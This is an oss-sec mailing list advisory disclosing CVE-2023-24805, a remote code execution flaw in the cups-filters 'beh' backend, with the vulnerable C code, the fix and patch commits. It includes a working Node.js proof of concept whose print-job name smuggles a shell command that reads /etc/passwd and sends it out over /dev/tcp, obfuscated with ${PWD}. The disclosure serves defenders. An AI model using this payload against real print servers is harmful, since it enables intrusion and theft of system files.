oss-sec mailing list archives

Previous By Date Next
Previous By Thread Next

CVE-2023-24805: RCE in cups-filters, beh CUPS backend

From: Till Kamppeter <till.kamppeter () gmail com>
Date: Wed, 17 May 2023 11:30:11 +0200
Following bug got reported to OpenPrinting's GitHub, repo cups-filters, as a private (security) issue report: 

https://github.com/OpenPrinting/cups-filters/security/advisories/GHSA-gpxc-v2m8-fr3x

Summary
If you use "beh" to create an accessible network printer, this security vulnerability can cause remote code execution. 

Details

cups-filters/backend/beh.c

Line 288 in 5c9498a
  retval = system(cmdline) >> 8;
// (context: argv = beh <job-id> <user> <title> <copies> <options> [file]) 
     snprintf(cmdline, sizeof(cmdline),
     "%s/backend/%s '%s' '%s' '%s' '%s' '%s' %s",
     cups_serverbin, scheme, argv[1], argv[2], argv[3],
           ...
     (argc == 6 ? "1" : argv[4]),
     argv[5], filename);
           ...
   retval = system(cmdline) >> 8;
The system function will be called here to execute the command, and the user and title parameters are user-controlled and unsanitized . 

PoC
start a beh service lpadmin -p myprinter -E -v beh:/1/3/5/socket://printer:9100 

     exploit: // https://github.com/williamkapke/ipp

var ipp = require('ipp');
var PDFDocument = require('pdfkit');
var concat = require("concat-stream");

var doc = new PDFDocument({margin:0});
doc.text("1.pdf", 0, 0);


doc.pipe(concat(function (data) {
var printer = ipp.Printer("http://127.0.0.1:6310/printers/myprinter";);
var msg = {
"operation-attributes-tag": {
"requesting-user-name": "Bumblebee",
"job-name": "';env; bash -c \"/usr/bin/cat ${PWD}etc/${PWD}/passwd > ${PWD}dev${PWD}tcp${PWD}127.0.0.1${PWD}1337\";'' #.pdf", 
"document-format": "application/pdf"
},
"job-attributes-tag":{
       "media-col": {
         "media-source": "tray-2"
       }
}
, data: data
};
printer.execute("Print-Job", msg, function(err, res){
console.log(err);
console.log(res);
});
}));
doc.end();


The report got assigned CVE-2023-24805
A fix is to use execv() instead of system() and was proposed as a pull request attached to the bug report. 

https://github.com/OpenPrinting/cups-filters-ghsa-gpxc-v2m8-fr3x/pull/1

The pull request is merged now into

https://github.com/OpenPrinting/cups-filters (branch "master")

as commit

https://github.com/OpenPrinting/cups-filters/commit/8f274035756

and the fix is also ported to the "1.x" branch of cups-filters, as commit

https://github.com/OpenPrinting/cups-filters/commit/93e60d3df35

The fix will also be included in the upcoming releases, 2.0.0 and 1.28.18.

   Till
Previous By Date Next
Previous By Thread Next

Current thread: